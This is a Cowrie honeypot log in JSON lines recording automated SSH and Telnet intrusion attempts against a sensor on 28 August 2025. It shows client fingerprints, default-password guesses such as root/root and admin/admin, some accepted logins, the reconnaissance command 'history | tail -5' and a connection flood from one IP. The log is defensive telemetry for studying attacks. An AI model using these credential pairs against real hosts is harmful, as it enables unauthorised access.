{"eventid":"cowrie.session.closed","duration":"109.3","message":"Connection lost after 109.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:08:25.498948Z","src_ip":"212.227.235.229","session":"8c524215239e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58342,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b8afb2eca9e","protocol":"ssh","message":"New connection: 212.227.125.160:58342 (1.2.3.4:22) [session: 4b8afb2eca9e]","sensor":"my-vps","timestamp":"2025-08-28T22:08:45.171843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:08:46.717762Z","src_ip":"212.227.125.160","session":"4b8afb2eca9e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:08:46.718962Z","src_ip":"212.227.125.160","session":"4b8afb2eca9e"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":34638,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f3ab4eeaa76","protocol":"telnet","message":"New connection: 157.245.55.194:34638 (1.2.3.4:23) [session: 0f3ab4eeaa76]","sensor":"my-vps","timestamp":"2025-08-28T22:08:49.548966Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T22:08:50.154820Z","src_ip":"157.245.55.194","session":"0f3ab4eeaa76"}
{"eventid":"cowrie.session.closed","duration":2.72385311126709,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:08:52.272751Z","src_ip":"157.245.55.194","session":"0f3ab4eeaa76"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":34642,"dst_ip":"1.2.3.4","dst_port":23,"session":"704922d297f9","protocol":"telnet","message":"New connection: 157.245.55.194:34642 (1.2.3.4:23) [session: 704922d297f9]","sensor":"my-vps","timestamp":"2025-08-28T22:08:52.457476Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:08:52.665904Z","src_ip":"212.227.125.160","session":"4b8afb2eca9e"}
{"eventid":"cowrie.session.closed","duration":1.1856167316436768,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:08:53.642994Z","src_ip":"157.245.55.194","session":"704922d297f9"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":34650,"dst_ip":"1.2.3.4","dst_port":23,"session":"6339da63a72e","protocol":"telnet","message":"New connection: 157.245.55.194:34650 (1.2.3.4:23) [session: 6339da63a72e]","sensor":"my-vps","timestamp":"2025-08-28T22:08:53.961789Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:08:56.302491Z","src_ip":"212.227.125.160","session":"4b8afb2eca9e"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T22:08:56.303236Z","src_ip":"212.227.125.160","session":"4b8afb2eca9e"}
{"eventid":"cowrie.session.closed","duration":4.3173980712890625,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:08:58.279101Z","src_ip":"157.245.55.194","session":"6339da63a72e"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":34662,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ef4ef5edd9c","protocol":"telnet","message":"New connection: 157.245.55.194:34662 (1.2.3.4:23) [session: 5ef4ef5edd9c]","sensor":"my-vps","timestamp":"2025-08-28T22:08:58.447266Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"3.1","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:08:59.370170Z","src_ip":"212.227.125.160","session":"4b8afb2eca9e"}
{"eventid":"cowrie.session.closed","duration":"14.2","message":"Connection lost after 14.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:08:59.371268Z","src_ip":"212.227.125.160","session":"4b8afb2eca9e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T22:08:59.754463Z","src_ip":"157.245.55.194","session":"5ef4ef5edd9c"}
{"eventid":"cowrie.session.closed","duration":5.2562456130981445,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:03.703441Z","src_ip":"157.245.55.194","session":"5ef4ef5edd9c"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":34194,"dst_ip":"1.2.3.4","dst_port":23,"session":"10cfd44ec3cf","protocol":"telnet","message":"New connection: 157.245.55.194:34194 (1.2.3.4:23) [session: 10cfd44ec3cf]","sensor":"my-vps","timestamp":"2025-08-28T22:09:03.877860Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":38186,"dst_ip":"1.2.3.4","dst_port":22,"session":"67805b644ea7","protocol":"ssh","message":"New connection: 201.148.180.50:38186 (1.2.3.4:22) [session: 67805b644ea7]","sensor":"my-vps","timestamp":"2025-08-28T22:09:04.738338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:09:06.238174Z","src_ip":"201.148.180.50","session":"67805b644ea7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:09:06.238912Z","src_ip":"201.148.180.50","session":"67805b644ea7"}
{"eventid":"cowrie.session.closed","duration":5.090592384338379,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:08.968364Z","src_ip":"157.245.55.194","session":"10cfd44ec3cf"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":54060,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb6b4dcbc3ad","protocol":"telnet","message":"New connection: 157.245.55.194:54060 (1.2.3.4:23) [session: fb6b4dcbc3ad]","sensor":"my-vps","timestamp":"2025-08-28T22:09:09.161432Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:09:13.037588Z","src_ip":"201.148.180.50","session":"67805b644ea7"}
{"eventid":"cowrie.session.closed","duration":4.051058769226074,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:13.212420Z","src_ip":"157.245.55.194","session":"fb6b4dcbc3ad"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":54064,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d7b7fa8b773","protocol":"telnet","message":"New connection: 157.245.55.194:54064 (1.2.3.4:23) [session: 4d7b7fa8b773]","sensor":"my-vps","timestamp":"2025-08-28T22:09:13.401997Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-28T22:09:14.007599Z","src_ip":"157.245.55.194","session":"4d7b7fa8b773"}
{"eventid":"cowrie.session.closed","duration":2.910998821258545,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:16.312908Z","src_ip":"157.245.55.194","session":"4d7b7fa8b773"}
{"eventid":"cowrie.session.connect","src_ip":"157.245.55.194","src_port":54070,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc27bd0bbc0e","protocol":"telnet","message":"New connection: 157.245.55.194:54070 (1.2.3.4:23) [session: bc27bd0bbc0e]","sensor":"my-vps","timestamp":"2025-08-28T22:09:16.489404Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:09:16.663608Z","src_ip":"201.148.180.50","session":"67805b644ea7"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T22:09:16.664778Z","src_ip":"201.148.180.50","session":"67805b644ea7"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:09:17.956953Z","src_ip":"157.245.55.194","session":"bc27bd0bbc0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:09:18.427282Z","src_ip":"157.245.55.194","session":"bc27bd0bbc0e"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-28T22:09:18.479557Z","src_ip":"157.245.55.194","session":"bc27bd0bbc0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:18.965724Z","src_ip":"201.148.180.50","session":"67805b644ea7"}
{"eventid":"cowrie.session.closed","duration":"14.3","message":"Connection lost after 14.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:19.012736Z","src_ip":"201.148.180.50","session":"67805b644ea7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","size":454,"shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","duplicate":false,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:19.779127Z","src_ip":"157.245.55.194","session":"bc27bd0bbc0e"}
{"eventid":"cowrie.session.closed","duration":3.2946243286132812,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:19.783962Z","src_ip":"157.245.55.194","session":"bc27bd0bbc0e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53548,"dst_ip":"1.2.3.4","dst_port":22,"session":"13a850fe9717","protocol":"ssh","message":"New connection: 217.72.205.35:53548 (1.2.3.4:22) [session: 13a850fe9717]","sensor":"my-vps","timestamp":"2025-08-28T22:09:36.198854Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:09:36.200064Z","src_ip":"217.72.205.35","session":"13a850fe9717"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7894,"dst_ip":"1.2.3.4","dst_port":22,"session":"77edc7263a7b","protocol":"ssh","message":"New connection: 212.227.235.229:7894 (1.2.3.4:22) [session: 77edc7263a7b]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.272269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.273323Z","src_ip":"212.227.235.229","session":"77edc7263a7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7924,"dst_ip":"1.2.3.4","dst_port":22,"session":"61449104323e","protocol":"ssh","message":"New connection: 212.227.235.229:7924 (1.2.3.4:22) [session: 61449104323e]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.274137Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7904,"dst_ip":"1.2.3.4","dst_port":22,"session":"268b12906f8c","protocol":"ssh","message":"New connection: 212.227.235.229:7904 (1.2.3.4:22) [session: 268b12906f8c]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.275206Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8032,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b767de709c9","protocol":"ssh","message":"New connection: 212.227.235.229:8032 (1.2.3.4:22) [session: 6b767de709c9]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.277314Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7902,"dst_ip":"1.2.3.4","dst_port":22,"session":"be641c7f0eea","protocol":"ssh","message":"New connection: 212.227.235.229:7902 (1.2.3.4:22) [session: be641c7f0eea]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.278118Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7980,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c7cb507cfa4","protocol":"ssh","message":"New connection: 212.227.235.229:7980 (1.2.3.4:22) [session: 0c7cb507cfa4]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.279155Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8060,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ebe652a4aef","protocol":"ssh","message":"New connection: 212.227.235.229:8060 (1.2.3.4:22) [session: 4ebe652a4aef]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.280161Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7922,"dst_ip":"1.2.3.4","dst_port":22,"session":"054331afa073","protocol":"ssh","message":"New connection: 212.227.235.229:7922 (1.2.3.4:22) [session: 054331afa073]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.281389Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8004,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfb3ef0b06fd","protocol":"ssh","message":"New connection: 212.227.235.229:8004 (1.2.3.4:22) [session: bfb3ef0b06fd]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.282432Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7912,"dst_ip":"1.2.3.4","dst_port":22,"session":"cac88380c723","protocol":"ssh","message":"New connection: 212.227.235.229:7912 (1.2.3.4:22) [session: cac88380c723]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.283326Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8206,"dst_ip":"1.2.3.4","dst_port":22,"session":"304c9ced0209","protocol":"ssh","message":"New connection: 212.227.235.229:8206 (1.2.3.4:22) [session: 304c9ced0209]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.284327Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8096,"dst_ip":"1.2.3.4","dst_port":22,"session":"804cba12643e","protocol":"ssh","message":"New connection: 212.227.235.229:8096 (1.2.3.4:22) [session: 804cba12643e]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.285588Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7938,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c7ea15fbb02","protocol":"ssh","message":"New connection: 212.227.235.229:7938 (1.2.3.4:22) [session: 8c7ea15fbb02]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.286638Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8154,"dst_ip":"1.2.3.4","dst_port":22,"session":"c078af94a6a3","protocol":"ssh","message":"New connection: 212.227.235.229:8154 (1.2.3.4:22) [session: c078af94a6a3]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.287730Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7960,"dst_ip":"1.2.3.4","dst_port":22,"session":"50459e2ed94b","protocol":"ssh","message":"New connection: 212.227.235.229:7960 (1.2.3.4:22) [session: 50459e2ed94b]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.288761Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7952,"dst_ip":"1.2.3.4","dst_port":22,"session":"6900bcd32cc5","protocol":"ssh","message":"New connection: 212.227.235.229:7952 (1.2.3.4:22) [session: 6900bcd32cc5]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.289660Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7940,"dst_ip":"1.2.3.4","dst_port":22,"session":"64a4edae596d","protocol":"ssh","message":"New connection: 212.227.235.229:7940 (1.2.3.4:22) [session: 64a4edae596d]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.290258Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7948,"dst_ip":"1.2.3.4","dst_port":22,"session":"010f3872944a","protocol":"ssh","message":"New connection: 212.227.235.229:7948 (1.2.3.4:22) [session: 010f3872944a]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.291123Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7994,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0cece41bf3","protocol":"ssh","message":"New connection: 212.227.235.229:7994 (1.2.3.4:22) [session: 4c0cece41bf3]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.292058Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8246,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cadf41aeac0","protocol":"ssh","message":"New connection: 212.227.235.229:8246 (1.2.3.4:22) [session: 2cadf41aeac0]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.292848Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8008,"dst_ip":"1.2.3.4","dst_port":22,"session":"da4fb51bdd71","protocol":"ssh","message":"New connection: 212.227.235.229:8008 (1.2.3.4:22) [session: da4fb51bdd71]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.293539Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8020,"dst_ip":"1.2.3.4","dst_port":22,"session":"a40d931b40cd","protocol":"ssh","message":"New connection: 212.227.235.229:8020 (1.2.3.4:22) [session: a40d931b40cd]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.294394Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8036,"dst_ip":"1.2.3.4","dst_port":22,"session":"d99067db7f09","protocol":"ssh","message":"New connection: 212.227.235.229:8036 (1.2.3.4:22) [session: d99067db7f09]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.295557Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8048,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d429f88c382","protocol":"ssh","message":"New connection: 212.227.235.229:8048 (1.2.3.4:22) [session: 9d429f88c382]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.296404Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8070,"dst_ip":"1.2.3.4","dst_port":22,"session":"971dee2568ef","protocol":"ssh","message":"New connection: 212.227.235.229:8070 (1.2.3.4:22) [session: 971dee2568ef]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.297180Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7976,"dst_ip":"1.2.3.4","dst_port":22,"session":"138d5c7e8716","protocol":"ssh","message":"New connection: 212.227.235.229:7976 (1.2.3.4:22) [session: 138d5c7e8716]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.298273Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8034,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff74d9e467a","protocol":"ssh","message":"New connection: 212.227.235.229:8034 (1.2.3.4:22) [session: 2ff74d9e467a]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.298992Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8078,"dst_ip":"1.2.3.4","dst_port":22,"session":"406ad0cd93dd","protocol":"ssh","message":"New connection: 212.227.235.229:8078 (1.2.3.4:22) [session: 406ad0cd93dd]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.299696Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8072,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3fc4204b67a","protocol":"ssh","message":"New connection: 212.227.235.229:8072 (1.2.3.4:22) [session: d3fc4204b67a]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.300342Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8138,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7c0b3b3fe87","protocol":"ssh","message":"New connection: 212.227.235.229:8138 (1.2.3.4:22) [session: a7c0b3b3fe87]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.301149Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8086,"dst_ip":"1.2.3.4","dst_port":22,"session":"c48996c45439","protocol":"ssh","message":"New connection: 212.227.235.229:8086 (1.2.3.4:22) [session: c48996c45439]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.301874Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8378,"dst_ip":"1.2.3.4","dst_port":22,"session":"12c310641a84","protocol":"ssh","message":"New connection: 212.227.235.229:8378 (1.2.3.4:22) [session: 12c310641a84]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.303096Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8092,"dst_ip":"1.2.3.4","dst_port":22,"session":"66cfba061dca","protocol":"ssh","message":"New connection: 212.227.235.229:8092 (1.2.3.4:22) [session: 66cfba061dca]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.303855Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8110,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb8fa707aa14","protocol":"ssh","message":"New connection: 212.227.235.229:8110 (1.2.3.4:22) [session: eb8fa707aa14]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.304727Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8426,"dst_ip":"1.2.3.4","dst_port":22,"session":"df568fdbbf70","protocol":"ssh","message":"New connection: 212.227.235.229:8426 (1.2.3.4:22) [session: df568fdbbf70]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.305416Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8126,"dst_ip":"1.2.3.4","dst_port":22,"session":"73ffd5e8d59e","protocol":"ssh","message":"New connection: 212.227.235.229:8126 (1.2.3.4:22) [session: 73ffd5e8d59e]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.306161Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8136,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea6c7f2d675e","protocol":"ssh","message":"New connection: 212.227.235.229:8136 (1.2.3.4:22) [session: ea6c7f2d675e]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.307116Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8266,"dst_ip":"1.2.3.4","dst_port":22,"session":"c780870ec0bb","protocol":"ssh","message":"New connection: 212.227.235.229:8266 (1.2.3.4:22) [session: c780870ec0bb]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.308013Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8182,"dst_ip":"1.2.3.4","dst_port":22,"session":"4245a93d2efd","protocol":"ssh","message":"New connection: 212.227.235.229:8182 (1.2.3.4:22) [session: 4245a93d2efd]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.308926Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8276,"dst_ip":"1.2.3.4","dst_port":22,"session":"05baf31ace39","protocol":"ssh","message":"New connection: 212.227.235.229:8276 (1.2.3.4:22) [session: 05baf31ace39]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.309685Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8166,"dst_ip":"1.2.3.4","dst_port":22,"session":"578e4fefda86","protocol":"ssh","message":"New connection: 212.227.235.229:8166 (1.2.3.4:22) [session: 578e4fefda86]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.310513Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8222,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ca56bfd521e","protocol":"ssh","message":"New connection: 212.227.235.229:8222 (1.2.3.4:22) [session: 9ca56bfd521e]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.311248Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8312,"dst_ip":"1.2.3.4","dst_port":22,"session":"c471bc8cf228","protocol":"ssh","message":"New connection: 212.227.235.229:8312 (1.2.3.4:22) [session: c471bc8cf228]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.312367Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8190,"dst_ip":"1.2.3.4","dst_port":22,"session":"b318c1207969","protocol":"ssh","message":"New connection: 212.227.235.229:8190 (1.2.3.4:22) [session: b318c1207969]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.313166Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8334,"dst_ip":"1.2.3.4","dst_port":22,"session":"1faa2175da37","protocol":"ssh","message":"New connection: 212.227.235.229:8334 (1.2.3.4:22) [session: 1faa2175da37]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.314017Z"}
